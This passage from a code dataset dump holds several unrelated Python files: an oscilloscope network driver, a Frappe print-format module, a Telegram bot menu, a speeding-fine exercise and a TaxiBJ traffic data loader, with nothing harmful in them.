build_topbar(self, draw):\n\n # clock\n clock_text = \"{} : {}\".format(self.h, self.m)\n\n x_clock_size = draw.textsize(clock_text, self.s_font)[0]\n x_clock = dispWidth - x_clock_size\n y_clock = 0\n\n draw.text((x_clock, y_clock), clock_text, \"white\", self.s_font)\n\n if self.Main.menu_mode == \"alarm_set\":\n x_txt = 0\n y_txt = 0\n if self.Main.Alarm.mod_alarm.mod_part in [\"h\", \"min\"]:\n draw.text((x_txt, y_txt),\n \"Zeit\", \"white\", self.s_font)\n elif self.Main.Alarm.mod_alarm.mod_part in [\"sound\"]:\n draw.text((x_txt, y_txt),\n \"Weckton\", \"white\", self.s_font)\n elif self.Main.Alarm.mod_alarm.mod_part in [\"light\"]:\n draw.text((x_txt, y_txt),\n \"Wecklicht\", \"white\", self.s_font)\n\n # radio\n elif self.Main.Speakers.crr_station is not None:\n radio_text = self.Main.Speakers.crr_station\n x_radio_text = 0\n y_radio_text = 0\n\n draw.text((x_radio_text, y_radio_text),\n radio_text, \"white\", self.s_font)\n\n # alarm symbol\n elif self.Main.Alarm.is_set24(): # only if radio is off\n alarm_sym = \"\\uf017\" # clock\n x_alarm_sym = 0\n y_alarm_sym = 0\n draw.text((x_alarm_sym, y_alarm_sym),\n alarm_sym, \"white\", self.awe_font)\n\n self.disp_update = False\n\n def set_menu_text(self, menu_text=None):\n ''' If no text is given grabs the current menu text.\n '''\n if menu_text is None:\n try:\n menu_text = self.Main.Menu.getMenuText()\n except AttributeError:\n menu_text = \"\" # booting, Menu not yet instantiated.\n self.menu_text = menu_text\n self.disp_update = True\n\n def set_disp_mode(self, disp_mode):\n ''' Set the mode of the display\n 0 = off\n 1 = menu\n 2 = big clock\n 3 = multiline\n 4 = set alarm clock\n '''\n if self.disp_mode == disp_mode:\n return\n # don't go from alarm settings into fullscreen\n if (self.disp_mode == 3 or self.disp_mode == 4) and disp_mode == 2:\n return\n # if disp_mode == 2:\n # self.Main.menu_mode = \"full_screen\"\n self.disp_mode = disp_mode\n self.disp_update = True\n\n\ndef disp_off():\n with canvas(disp) as draw:\n draw.text((0, 0), \"\", \"white\")\n\n\ndef make_font(name, size):\n font_path = str(Path(__file__).resolve().parent / \"fonts\" / name)\n return ImageFont.truetype(font_path, size)\n","sub_path":"dispmod.py","file_name":"dispmod.py","file_ext":"py","file_size_in_byte":12375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"80172915","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport socket,sys,time\nimport collections\nimport binascii\n\n\n\ndef closerVal(val, nlist=[0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10]):\n \"\"\"\n take the closer value 'floor' under the select value in the selected list\n returns the list (one under, closer, one above, value)\n used to select the calibre of the oscillo\n => closerVal(x)[0] => zoom in\n => closerVal(x)[2] => zoom out\n \"\"\"\n i, closer =min(enumerate(nlist), key=lambda x:abs(x[1]-val))\n above = nlist[i+1] if i < len(nlist)-1 else nlist[-1]\n under = nlist[i-1] if i > 0 else closer\n return under, closer, above, val\n\n\n\nclass OscilloWavePro:\n Measure = collections.namedtuple('Measure',\n 'SLOT TEXT AVG HIGH LAST LOW SIGMA SWEEPS')\n \n BUFFER_SIZE = 1024\n\n def __init__(self, ip='192.168.0.45', port=1861):\n self.name= \"WavePro735Zi\"\n self.ip=ip\n self.port=port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.settimeout(2)\n self.connect()\n self.response = \"\"\n self.response_header = None\n# self.idn = self.send(\"*IDN?\")\n \n\n def __del__(self):\n self.s.close()\n\n def close(self):\n del(self)\n\n def connect(self):\n self.s.connect((self.ip, self.port))\n\n def send(self, MESSAGE=\"*IDN?\"):\n tmp = self.sendBytes(MESSAGE.encode('ascii'))\n tmp = tmp[:-1]\n tmp = tmp[8:].decode('ascii')\n self.response = tmp\n return self.response\n\n \n def get(self):\n return self.s.recv(self.BUFFER_SIZE)\n\n def purge(self):\n try:\n self.s.recv(self.BUFFER_SIZE)\n except socket.timeout:\n pass\n \n\n def getVal(self, req):\n \"\"\"\n convenient generic function send request return\n WARNING could not work for some specifics\n Work with ie. #=> getVal(\"C1:VDIV?\") ==> C1:VDIV 20E-3 V => 20E-3\n IndexError: list index out of range *ù$! peut arriver\n ==> lancer self.s.recv(self.BUFFER_SIZE)\n ==> lancer osc.s.recv(osc.BUFFER_SIZE)\n pour purger\n \"\"\"\n self.send(req)\n ret=self.response.split(' ')[1]\n return float(ret)\n\n def pava(self,ps=(\"MIN\", \"MAX\"), ch=1):\n \"\"\"osc.pava((\"MEAN\",), 1) or osc.pava((\"MEAN\",\"MAX\"), 1)\n \"\"\"\n ret=self.send(\"C{}:PAVA? \".format(ch)+', '.join(ps)).split(\"PAVA \")[1]\n return [float(ret.split(p+',')[1].split(' ')[0]) for p in ps]\n # tmp=self.send(\"C{}:PAVA? \".format(ch)+', '.join(ps))\n # tmp=tmp.replace('MIN,', ' ').replace('MAX,', ' ').split(' ')\n # return [float(tmp[i]) for i in range(2,2*len(ps)+1,2)]\n\n def clearSweeps(self):\n self.send(\"CLSW\")\n\n def setCaliber(self, ch, vdiv, offset=0):\n self.send(\"C{}:VDIV {}; C{}:OFST {}\".format(ch, vdiv, ch, offset))\n\n def ymix(self, ch):\n tmp=self.send(\"C{}:PAVA? MIN, MAX\".format(ch))\n # tmp=\"C1:PAVA MIN,11E-3 V,OK,MAX,503E-3 V,OK\"\n tmp=tmp.replace('MIN,', ' ').replace('MAX,', ' ').split(' ')\n # mini=float(tmp[2]); maxi=float(tmp[4])\n return [float(tmp[i]) for i in (2,4)]\n\n def getPmax(self, ch=1, NUM1=3, restore=False):\n self.clearSweeps()\n old_P = self.getMeasureSlot(1), self.getMeasureSlot(2) if restore else None\n self.setMeasureSlot(1, 'MIN, C{}'.format(ch))\n self.setMeasureSlot(2, 'MAX, C{}'.format(ch))\n NUM=0\n while NUM(3+NDIV)*vdiv:\n vdiv=closerVal(vdiv)[2]\n self.send(\"C{}:VDIV {}; C{}:OFST {}\".format(\n CH, vdiv, CH, -NDIV*vdiv))\n while float(self.getMeasurement(PX).SWEEPS) <= 2:\n pass\n ymax=float(self.getMeasurement(PX).AVG)\n\n vdiv=self.getVal(\"C{}:VDIV?\".format(CH))\n if ZOOM:\n vdiv=ymax/(2+NDIV)\n self.send(\"C{}:VDIV {}\".format(CH, vdiv))\n return vdiv\n\n def mkdir(self, dirname='D:\\LARZIC\\CH2'):\n \"\"\" Danger, does not create parent direcory \"\"\"\n self.send(\"DIRectory DISK,HDD,ACTION,CREATE,'{}'\".format(dirname))\n\n def saveDir(self, dirname='D:\\LARZIC\\CH2'):\n self.send(\"vbs 'app.SaveRecall.Waveform.WaveformDir=\\\"{}\\\"'\".format(dirname))\n\n def saveCurve(self,CurvName=\"OUT\", Curve=None):\n self.send(\"vbs 'app.SaveRecall.Waveform.SaveSource=\\\"{}\\\"'\".format(Curve)) if Curve else None\n self.send(\"vbs 'app.SaveRecall.Waveform.TraceTitle=\\\"{}\\\"'\".format(CurvName))\n self.send(\"vbs 'app.SaveRecall.Waveform.DoSave'\")\n\n def optimizeCaliber(self, ch, start1VperDiv=False):#, nSweeps=0):\n \"\"\"\n set vertical caliber and cursor of the given channel to use\n all the screen available for display.\n \"\"\"\n NDIV = 6\n \n # we need to mesure min and max, but we save the current parameters\n # to restore them afterwards\n old_params = self.getMeasureSlot(1), self.getMeasureSlot(2)\n self.setMeasureSlot(1, 'MIN, C{}'.format(ch))\n self.setMeasureSlot(2, 'MAX, C{}'.format(ch))\n\n # start with cursor in the middle of the screen and \n # a 1V/div caliber. The signal should hopefully fit on the screen.\n if start1VperDiv:\n vdiv = 1\n offset = 0\n else:\n vdiv = float(self.getVal(\"C{}:VDIV?\".format(ch)))\n offset = float(self.getVal(\"c{}:OFST?\".format(ch)))\n\n redo = True\n while (redo):\n self.setCaliber(ch, vdiv, offset) \n # acq_ok = 0\n # while not acq_ok:\n # self.send(\"INR?\")\n # acq_ok = int(self.response.split(' ')[1]) & 1\n \n # typical response\n #C1:PAVA MIN,11E-3 V,OK,MAX,503E-3 V,OK\n # tmp = self.response.split(',')\n self.send(\"CLSW;ARM;WAIT\")\n ymin = float(self.getMeasurement(1).AVG) \n ymax = float(self.getMeasurement(2).AVG)\n self.send(\"TRMD AUTO\")\n\n self.send(\"C{}:PAVA? MIN, MAX\".format(ch))\n tmp = self.response.split(',')\n ok = tmp[2]=='OK' and tmp[5]=='OK'\n\n old_vdiv = vdiv\n old_offset = offset\n vdiv = (ymax-ymin)/NDIV if ok else 1\n offset = -(ymin+ymax)/2 if ok else 0\n #print ymin, ymax, vdiv, old_vdiv\n\n redo = abs(old_vdiv - vdiv)/vdiv > 0.01\n\n # restore old parameters\n self.send(old_params[0])\n self.send(old_params[1])\n\n def avgs(self):\n measures=self.send(\"PAST? CUST, AVG\").split('AVG,')[1].split(',')\n measures=[m.split(' V')[0].split(' S')[0] for m in measures]\n return measures\n\n def yfit(self,ch=1,**kwargs):\n vdivNotMin=True\n loop=0\n self.clearSweeps()\n vdiv, offset, ymin, ymax, gmax, gmin=self.getFrame(ch)\n if (ymin>gmax or ymax=gmax: # TODO : traiter a part le cas ymax>=gmax and ymin>gmin\n loop+=1\n vdiv = closerVal(vdiv)[2]# closerVal((ymax-ymin)/NDIV)[0]\n # if ymin>gmin:# sinon on ne touche pas a offset\n # offset=-ymin-3*vdiv\n self.setCaliber(ch,vdiv, offset)\n ymin, ymax=self.pava((\"MIN\", \"MAX\"),ch)\n# ymin, ymax=self.getPmax(ch, **kwargs)\n gmax = 4*vdiv-offset; gmin = -4*vdiv-offset\n while ymin<=gmin: # TODO : traiter a part le cas ymax 0.001 and vdivNotMin):\n loop+=1\n vdiv = closerVal(vdiv)[0]# closerVal((ymax-ymin)/NDIV)[0]\n offset = -(ymax+ymin)/2\n self.setCaliber(ch,vdiv, offset)\n vdivNotMin = True if vdiv == self.getVal(\"C{}:VDIV?\".format(ch)) else False\n ymin, ymax=self.pava((\"MIN\", \"MAX\"),ch)\n# ymin, ymax=self.getPmax(ch, **kwargs)\n gmax = 4*vdiv-offset; gmin = -4*vdiv-offset\n # final zoom when ymax and ymin are in the screen for sure:\n # vdiv, offset, ymin, ymax, gmax, gmin=getFrame(osc,ch)\n vdiv, offset, ymin, ymax, gmax, gmin=self.getFrame(ch, **kwargs)\n vdiv=(ymax-ymin)/6\n offset=-(ymax+ymin)/2\n self.setCaliber(ch,vdiv, offset)\n return loop\n\n#__________________\n \n def zoomCalibre(self):\n vdiv=self.getVal(\"VDIV?\")\n vdiv=closerVal(float(vdiv))[0]\n self.send(\"VDIV {}\".format(vdiv))\n\n def unzoomCalibre(self):\n vdiv=self.getVal(\"VDIV?\")\n vdiv=closerVal(float(vdiv))[0]\n self.send(\"VDIV {}\".format(vdiv))\n \n def beep(self,N=2):\n [self.send(\"BUZZ BEEP\") for i in range(N)]\n \n def setMaxZoom(self, CH=1, PX=None, ZM=2, NUM=2):\n \"\"\"\n zoom to the parameter \"ie maximum\" between +/- sdev (SIGMA)\n Warning, OFFSET cannot be above 1V or under -1V. why ?...\n (I can hear the relay clicking , changing some param in the scope)\n if VDIV<=100mv .. pfff. give-up that function\n \"\"\"\n PX=CH if PX is None else PX\n while float(self.getMeasurement(PX).SWEEPS) <= NUM:\n pass\n ret=self.getMeasurement(PX)\n self.send(\"C{}:VDIV {};C{}:OFST {}\".format(\n CH, ZM*float(ret.SIGMA), CH, -float(ret.AVG)))\n\n def pp_digital(self, pp=True):\n s1,s2=[int(self.send(\"vbs? return=app.LogicAnalyzer.Digital{}.Out.Result.Samples\".format(i)).strip(\"^VBS \")) for i in range(1,3)]\n l1,l2=[int(self.send(\"vbs? return=app.LogicAnalyzer.Digital{}.Out.Result.Lines\".format(i)).strip(\"^VBS \")) for i in range(1,3)]\n if pp:\n print(\"Digital1:{}-bit, Digital2:{}-bit, resp. with {}, and {} samples\".format(l1,l2,s1,s2))\n return(l1,l2,s1,s2)\n \n def getDigitalBus(self, setup=2, sample=1, pp=True):\n cmd_line = \":\".join([\"VBS? '\",\n \"lines = app.LogicAnalyzer.Digital%d.Out.Result.Lines\" % setup,\n \"val=0\", \n \"res = app.LogicAnalyzer.Digital%d.Out.Result.DataArray(1,-1,%d,0)\" % (setup, sample),\n \"for line = 0 To lines-1\",\n \"val=val + res(0,line)*2^line\",\n \"Next\",\n \"return=val\"\n ]) \n samples = self.send(cmd_line)\n ret=samples.lstrip(\"VBS \")\n if pp:\n print(ret+\"=\"+hex(int(ret))+\"=\"+format(int(ret), '#018b')+\" ROW_{} COL_{}\".format(int(ret)&0x7F, int(ret)>>7))\n return ret\n\n def getDigitalWaveForm(self, setup=1, line= 1):\n \"\"\" electronics.stackexchange.com/questions/430542/reading-digital-wafevorms-via-vxi11-from-the-lecroy-wavesurfer-510-ms-500\n \"\"\"\n cmd_line = \":\".join([\"VBS? 't=\\\"\\\"\",\n \"num_samples = app.LogicAnalyzer.Digital{}.Out.Result.Samples\".format(setup),\n \"sample=0\", \n \"last_sample=255\",\n \"res = app.LogicAnalyzer.Digital{}.Out.Result.DataArray(-1,1,0,{})\".format(setup, line),\n \"for j = 0 To num_samples-1\",\n \"sample = res(j,0)\",\n \"If ( (last_sample) <> (sample) ) Then \" \"last_sample=sample:t = t & sample & \\\"@\\\" & j & \\\",\\\" \" \"End If\",\n \"Next\",\n \"return=t\"\n ]) \n return self.send(cmd_line).lstrip(\"VBS \")\n\n def getDigitalWaveForms(self):\n n1,n2=self.pp_digital(False)[0:2]\n print(\"Digital1:\")\n for n in range(1,n1+1):\n print(self.getDigitalWaveForm(1,n))\n print(\"Digital2:\")\n for n in range(n2):\n print(self.getDigitalWaveForm(2,n))\n \n \n def getFile(self, remote_path, local_path):\n \"\"\"\n Get a file from the remote Lecroy file system to our local drive using the TRFL function.\n \n This makes the scope send a bunch of weird 0x82 operation, sometimes in the same TCP\n packets containing the wanted file. As far as I can tell, the 0x82 operation send by the\n scope in response are as follow:\n - 5 bytes b'TRFL '\n - 11 bytes starting with b'#' and a large number (don't know what it is)\n - the wanted file in chuncks of 1683384 bytes\n \n I just ignore the first 2 0x82 operations and write to disk the payload of all the \n subsequent ones.\n Finally the scope sends an empty 0x83 operation signaling the end of the file transfer\n \"\"\"\n cmd = f\"TRFL? DISK,HDD,FILE, {remote_path}\".encode('ascii')\n tmp = self.sendBytes(cmd)\n \n with open(local_path, 'wb') as wfile:\n end_ = False\n op_number = 0\n tmp_idx = 0\n \n while not end_:\n\n if tmp[tmp_idx:tmp_idx+4] == binascii.unhexlify('82010100'):\n op_number += 1\n op_len = int.from_bytes(tmp[tmp_idx+4:tmp_idx+8], byteorder='big')\n if tmp_idx+op_len+8 >= len(tmp):\n tmp += self.s.recv(self.BUFFER_SIZE)\n else:\n payload = tmp[tmp_idx+8:tmp_idx+op_len+8]\n if op_number > 2:\n wfile.write(payload)\n tmp_idx += op_len+8\n elif tmp[tmp_idx:tmp_idx+4] == binascii.unhexlify('83010100'):\n end_ = True\n else:\n print(tmp, op_number, tmp_idx, len(tmp))\n raise ValueError(\"Cannot understand scope response\")\n \n \n def sendBytes(self, MESSAGE=b\"*IDN?\"):\n TAILLE = len(b\"\" + MESSAGE)\n HEADER = \"81\"+\"01\"+\"01\"+\"00\"+ (\"%08x\" % TAILLE)\n msg = binascii.unhexlify(HEADER) + MESSAGE\n\n try:\n self.s.send(msg)\n if b'?' in MESSAGE:\n psn = None\n tmp = b''\n while tmp[-1:] != b'\\n':\n tmp += self.s.recv(self.BUFFER_SIZE)\n if psn is None:\n operation = tmp[0]\n prot_ver = tmp[1]\n if (operation != 0x83 and operation != 0x82) or prot_ver != 1:\n raise ValueError(\"Cannot understand scope response\")\n sn = tmp[2]\n #if sn != psn + 1:\n # print(\"Warnning: unxpected sequence number, ignoring data\")\n # return \"\"\n psn = sn \n data_len = int.from_bytes(tmp[4:8], byteorder='big')\n if operation == 0x82:\n break \n self.response = tmp\n return self.response\n except socket.error as e:\n self.connect()\n self.send(msg)\n \n\n#USAGE for shell test (not import from python)\n#python drivers/OscilloWavePro.py -ip '192.168.0.48' -port 5025\nif __name__ == '__main__':\n import readline\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-ip', default='169.254.222.45')\n parser.add_argument('-port', default=4000)\n args = parser.parse_args()\n ip=args.ip\n print(\"Si ca marche pas, un autre process doit etre en marche -> kill\")\n ws = OscilloWavePro(ip)\n print(\"Connected ?\")\n print( \"\"\" ____exemple:____ respond\n C1:VDIV? #<== Voltage / division of channel 1\n TDIV? #<== time / division\n TDIV 1E-3 #<== above 50us allowed when SetMaximumMemory set!\n PAST? CUST,P1 #<== measure given by param 1 , mean, max, sdev...\n SCDP #<== screen dump = save to file.png\n C1:OFfSeT? #<== OFST, gives the offset of channel 1\n PACU? 1 #<== reply how is set the parameter 1\n C2:TRA OFF #<== disable 'Trace On' for C2 curve\n F1:DEF? #<== syntax definition of math function\n C1:ASET FIND #<== put channel 1 in a window scale (offest and div)\n BUZZ BEEP; BUZZ BEEP #<== 2beep sound emitted by the scope\n DIRectory DISK,HDD,ACTION,CREATE,'D:\\LARZIC\\CH2' #<== create directory\n # set manually a parameter then ask 'PACU? 1' what is the syntax\n PACU 3, DDLY, C1, C2 #<== set param 1 as the delay between ch1 and ch2\n VBS 'app.Acquisition.Trigger.C2.Level=0.055' #<== more advanced features\n vbs 'app.SystemControl.CloseDialog' #<== close the bottom panel if opened\n \"\"\" )\n print( 'to (q)uit type q\\n')\n\n msg = \"*IDN?\"\n while msg != 'q':\n ws.send(msg)\n if '?' in msg:\n print( ws.response)\n msg = raw_input('>')\n ws.close()\n","sub_path":"drivers/OscilloWavePro_.py","file_name":"OscilloWavePro_.py","file_ext":"py","file_size_in_byte":20856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"299852115","text":"# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors\n# MIT License. See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe, os\nimport frappe.utils\nfrom frappe.modules import get_doc_path\n\nstandard_format = \"templates/print_formats/standard.html\"\n\nfrom frappe.model.document import Document\n\nclass PrintFormat(Document):\n\tdef validate(self):\n\t\tif self.standard==\"Yes\" and frappe.session.user != \"Administrator\":\n\t\t\tfrappe.throw(frappe._(\"Standard Print Format cannot be updated\"))\n\n\t\t# old_doc_type is required for clearing item cache\n\t\tself.old_doc_type = frappe.db.get_value('Print Format',\n\t\t\t\tself.name, 'doc_type')\n\n\tdef on_update(self):\n\t\tif hasattr(self, 'old_doc_type') and self.old_doc_type:\n\t\t\tfrappe.clear_cache(doctype=self.old_doc_type)\n\t\tif self.doc_type:\n\t\t\tfrappe.clear_cache(doctype=self.doc_type)\n\n\t\tself.export_doc()\n\n\tdef export_doc(self):\n\t\t# export\n\t\tif self.standard == 'Yes' and (frappe.conf.get('developer_mode') or 0) == 1:\n\t\t\tfrom frappe.modules.export_file import export_to_files\n\t\t\texport_to_files(record_list=[['Print Format', self.name]],\n\t\t\t\trecord_module=self.module)\n\n\tdef on_trash(self):\n\t\tif self.doc_type:\n\t\t\tfrappe.clear_cache(doctype=self.doc_type)\n\ndef get_args():\n\tif not frappe.form_dict.format:\n\t\tfrappe.form_dict.format = standard_format\n\tif not frappe.form_dict.doctype or not frappe.form_dict.name:\n\t\treturn {\n\t\t\t\"body\": \"\"\"

Error

\n\t\t\t\t

Parameters doctype, name and format required

\n\t\t\t\t
%s
\"\"\" % repr(frappe.form_dict)\n\t\t}\n\n\tdoc = frappe.get_doc(frappe.form_dict.doctype, frappe.form_dict.name)\n\tfor ptype in (\"read\", \"print\"):\n\t\tif not frappe.has_permission(doc.doctype, ptype, doc):\n\t\t\treturn {\n\t\t\t\t\"body\": \"\"\"

Error

\n\t\t\t\t\t

No {ptype} permission

\"\"\".format(ptype=ptype)\n\t\t\t}\n\n\treturn {\n\t\t\"body\": get_html(doc),\n\t\t\"css\": get_print_style(frappe.form_dict.style),\n\t\t\"comment\": frappe.session.user\n\t}\n\ndef get_html(doc, name=None, print_format=None):\n\tfrom jinja2 import Environment\n\n\tif isinstance(doc, basestring) and isinstance(name, basestring):\n\t\tdoc = frappe.get_doc(doc, name)\n\n\ttemplate = Environment().from_string(get_print_format_name(doc.doctype,\n\t\tprint_format or frappe.form_dict.format))\n\tmeta = frappe.get_meta(doc.doctype)\n\n\targs = {\n\t\t\"doc\": doc,\n\t\t\"meta\": meta,\n\t\t\"frappe\": frappe,\n\t\t\"utils\": frappe.utils\n\t}\n\thtml = template.render(args)\n\treturn html\n\ndef get_print_format_name(doctype, format_name):\n\tif format_name==standard_format:\n\t\treturn format_name\n\n\t# server, find template\n\tpath = os.path.join(get_doc_path(frappe.db.get_value(\"DocType\", doctype, \"module\"),\n\t\t\"Print Format\", format_name), format_name + \".html\")\n\tif os.path.exists(path):\n\t\twith open(path, \"r\") as pffile:\n\t\t\treturn pffile.read()\n\telse:\n\t\thtml = frappe.db.get_value(\"Print Format\", format_name, \"html\")\n\t\tif html:\n\t\t\treturn html\n\t\telse:\n\t\t\treturn \"No template found.\\npath: \" + path\n\ndef get_print_style(style=None):\n\tif not style:\n\t\tstyle = frappe.db.get_default(\"print_style\") or \"Standard\"\n\tpath = os.path.join(get_doc_path(\"Core\", \"DocType\", \"Print Format\"), \"styles\",\n\t\tstyle.lower() + \".css\")\n\tif not os.path.exists(path):\n\t\tif style!=\"Standard\":\n\t\t\treturn get_print_style(\"Standard\")\n\t\telse:\n\t\t\treturn \"/* Standard Style Missing ?? */\"\n\telse:\n\t\twith open(path, 'r') as sfile:\n\t\t\treturn sfile.read()\n","sub_path":"frappe/core/doctype/print_format/print_format.py","file_name":"print_format.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"417417265","text":"import random\nimport telegram\n\nMENU = [[('handler', 'Venues ☕', 'foursquare-location-choice'),\n ('handler', 'Weather 🌤', 'weather-show'),\n ('handler', 'News 📰', 'news-get-entry')],\n [('handler', 'Vinci 🌇', 'vinci-upload-image'),\n ('handler', 'Get Uber 🚘', 'uber-choose-location'),\n ('handler', 'Wolfram 📊', 'wolfram-ask')],\n [('handler', '9GAG 😅', 'meme-show'),\n ('handler', 'Product Hunt 😺', 'producthunt-get-entry'), ],\n [('handler', 'Wikipedia 📚', 'wiki-search'),\n ('handler', 'Subscriptions 📬', 'subscriptions-show')],\n [('handler', 'Change location 🗺', 'location-new')]]\n\nGREETING_PHRASES = ['What do you want to do? 🤖',\n 'Do you need anything? 🤖',\n 'How can I help you today? 🤖',\n 'Any way I can help you? 🤖']\n\n\ndef register(bot):\n bot.handlers['main-menu'] = main_menu\n\n bot.callback_handlers['main-menu-callback'] = main_menu_callback\n\n\ndef main_menu(message, bot, phrase=None):\n if not bot.user_get(message.u_id, 'registered'):\n bot.call_handler(message, 'welcome-message')\n return\n\n if not message.moved:\n for line in MENU:\n for row in line:\n if row[0] == 'handler' and row[1] == message.text:\n message.handler = row[2]\n return bot.call_handler(message, row[2])\n\n keyboard = get_keyboard()\n reply_markup = telegram.ReplyKeyboardMarkup(keyboard, resize_keyboard=True)\n bot.telegram.send_message(message.u_id, phrase or random.choice(GREETING_PHRASES),\n reply_markup=reply_markup)\n\n\ndef main_menu_callback(query, bot):\n query.message.moved = True\n bot.call_handler(query.message, 'main-menu')\n\n\ndef get_keyboard():\n keyboard = []\n for line in MENU:\n subkeyboard = []\n for row in line:\n if row[0] == 'handler':\n subkeyboard.append(row[1])\n if subkeyboard:\n keyboard.append(subkeyboard)\n return keyboard\n","sub_path":"modules/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614562388","text":"#Exercício Python 029: Escreva um programa que leia a velocidade de um carro. Se ele ultrapassar 80Km/h, mostre uma\r\n# mensagem dizendo que ele foi multado. A multa vai custar R$7,00 por cada Km acima do limite.\r\n\r\nv_carro = int(input('Qual a velocidade do carro?'))\r\n\r\nif v_carro > 80:\r\n multa = float((v_carro - 80) * 7)\r\n print('MULTADO! Você excedeu o limite permitido de 80Km/h\\nVocê deve pagar uma multa de R${:.2f}'.format(multa))\r\nelse:\r\n print('Tenha um BOM DIA! Dirija com SEGURANÇA!')","sub_path":"ex029.py","file_name":"ex029.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"138309584","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\n# import cPickle as pickle\nimport pickle\nfrom copy import copy\nimport numpy as np\nimport h5py\nfrom utils.preprocessing import load_stdata, STMatrix\nfrom utils.preprocessing import MinMaxNormalization, remove_incomplete_days, timestamp2vec\n\n# from ..config import Config\nnp.random.seed(1337) # for reproducibility\n\n# parameters\n# DATAPATH = Config().DATAPATH\ndatapath = './datasets/TaxiBJ/'\n\n\ndef data_slide_window_timestamps(data, timestamps, meta_data, window_len=6):\n x, y, timestamps_X, meta_data_X = [], [], [], []\n for i in range(window_len, len(data)):\n # print(i)\n x.append([data[j] for j in range(i - window_len, i)])\n timestamps_X.append([timestamps[j] for j in range(i - window_len, i)])\n meta_data_X.append([meta_data[j] for j in range(i - window_len, i)])\n y.append(data[i])\n return x, y, timestamps_X, meta_data_X\n\n\ndef load_holiday(timeslots, fname=os.path.join(datapath, 'TaxiBJ', 'BJ_Holiday.txt')):\n f = open(fname, 'r')\n holidays = f.readlines()\n holidays = set([h.strip() for h in holidays]) # delete the blank of every string\n H = np.zeros(len(timeslots))\n for i, slot in enumerate(timeslots):\n if slot[:8] in holidays:\n H[i] = 1\n print(H.sum())\n # print(timeslots[H==1])\n return H[:, None]\n\n\n# holiday_test = load_holiday(timeslots=24)\n\n\ndef load_meteorol(timeslots, fname=os.path.join(datapath, 'TaxiBJ', 'BJ_Meteorology.h5')):\n '''\n timeslots: the predicted timeslots\n In real-world, we dont have the meteorol data in the predicted timeslot, instead, we use the meteoral at previous timeslots, i.e., slot = predicted_slot - timeslot (you can use predicted meteorol data as well)\n '''\n f = h5py.File(fname, 'r')\n Timeslot = f['date'].value\n WindSpeed = f['WindSpeed'].value\n Weather = f['Weather'].value\n Temperature = f['Temperature'].value\n f.close()\n\n M = dict() # map timeslot to index\n for i, slot in enumerate(Timeslot):\n M[slot] = i\n\n WS = [] # WindSpeed\n WR = [] # Weather\n TE = [] # Temperature\n for slot in timeslots:\n predicted_id = M[slot]\n cur_id = predicted_id - 1\n WS.append(WindSpeed[cur_id])\n WR.append(Weather[cur_id])\n TE.append(Temperature[cur_id])\n\n WS = np.asarray(WS)\n WR = np.asarray(WR)\n TE = np.asarray(TE)\n\n # 0-1 scale\n WS = 1. * (WS - WS.min()) / (WS.max() - WS.min())\n TE = 1. * (TE - TE.min()) / (TE.max() - TE.min())\n\n print(\"shape: \", WS.shape, WR.shape, TE.shape)\n\n # concatenate all these attributes\n merge_data = np.hstack([WR, WS[:, None], TE[:, None]])\n\n # print('meger shape:', merge_data.shape)\n return merge_data\n\n\n# def load_data(T=48, nb_flow=2, len_closeness=None, len_period=None, len_trend=None,\n# len_test=None, preprocess_name='preprocessing.pkl',\n# meta_data=True, meteorol_data=True, holiday_data=True):\ndef load_data(T=48, nb_flow=2, len_test=None, preprocess_name='preprocessing.pkl',\n meta_data=True, meteorol_data=True, holiday_data=True, window_len=12):\n # assert(len_closeness + len_period + len_trend > 0)\n # load data\n # 13 - 16\n data_all = []\n timestamps_all = list()\n for year in range(13, 17):\n fname = os.path.join(\n datapath, 'TaxiBJ', 'BJ{}_M32x32_T30_InOut.h5'.format(year))\n print(\"file name: \", fname)\n # stat(fname)\n data, timestamps = load_stdata(fname)\n # print(timestamps)\n # remove a certain day which does not have 48 timestamps\n data, timestamps = remove_incomplete_days(data, timestamps, T)\n data = data[:, :nb_flow]\n data[data < 0] = 0.\n data_all.append(data)\n timestamps_all.append(timestamps)\n print(\"\\n\")\n\n # minmax_scale\n data_train = np.vstack(copy(data_all))[:-len_test]\n print('train_data shape: ', data_train.shape)\n mmn = MinMaxNormalization()\n mmn.fit(data_train)\n data_all_mmn = [mmn.transform(d) for d in data_all]\n data_all_mmn_vstack = np.vstack(copy(data_all_mmn))\n timestamps_all_vstack = []\n for timestamps_element in timestamps_all:\n timestamps_all_vstack += timestamps_element\n # timestamps_all_vstack = np.vstack(copy(timestamps_all)\n\n fpkl = open(preprocess_name, 'wb')\n for obj in [mmn]:\n pickle.dump(obj, fpkl)\n fpkl.close()\n\n meta_feature = []\n if meta_data:\n # load time feature\n time_feature = timestamp2vec(timestamps_all_vstack)\n meta_feature.append(time_feature)\n if holiday_data:\n # load holiday\n holiday_feature = load_holiday(timestamps_all_vstack)\n meta_feature.append(holiday_feature)\n if meteorol_data:\n # load meteorol data\n meteorol_feature = load_meteorol(timestamps_all_vstack)\n meta_feature.append(meteorol_feature)\n\n meta_feature = np.hstack(meta_feature) if len(\n meta_feature) > 0 else np.asarray(meta_feature)\n metadata_dim = meta_feature.shape[1] if len(\n meta_feature.shape) > 1 else None\n if metadata_dim < 1:\n metadata_dim = None\n if meta_data and holiday_data and meteorol_data:\n print('time feature:', time_feature.shape, 'holiday feature:', holiday_feature.shape,\n 'meteorol feature: ', meteorol_feature.shape, 'mete feature: ', meta_feature.shape)\n\n X, Y, timestamps_X, meta_feature_X = data_slide_window_timestamps(data_all_mmn_vstack, window_len=window_len,\n 